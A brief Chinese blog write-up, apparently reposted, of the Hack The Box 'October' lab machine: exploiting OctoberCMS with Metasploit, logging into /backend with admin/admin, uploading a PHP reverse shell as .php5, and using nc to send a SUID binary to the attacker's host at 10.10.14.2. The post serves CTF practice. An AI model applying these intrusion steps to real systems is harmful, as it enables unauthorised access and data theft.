其他分享
首页 > 其他分享> > htb-machines-October

htb-machines-October

作者:互联网

信息收集

端口

网页

网页有写是OctoberCMS,可以查询有无版本漏洞

msf

msf一把梭,找到版本漏洞,并且可以打

虽然可以打,但是这个返回的shell没什么权限,也不能用python再弹个shell,whoami的命令都执行不了,果断放弃,看看文档在哪上传的,自己上传马

getshell

后台路径/backend

管理员弱口令,admin/admin

可以上传一个php反弹shell的文件,改个后缀名php5即可

成功反弹shell,www-data权限

在/home/harry/user.txt中找到user的flag

提权

先获取下pyt

python -c 'import pty; pty.spawn("/bin/bash")'

再把文件pull下来看看

靶机:nc 10.10.14.2 6666 < /usr/local/bin/ovrflw

攻击机:nc -lvnp 6666 > over

缓冲区溢出,具体是啥咱也不懂。。。给pwn

标签:shell,htb,python,xb7,ovrflw,October,pty,上传,machines
来源: https://www.cnblogs.com/karsa/p/14352436.html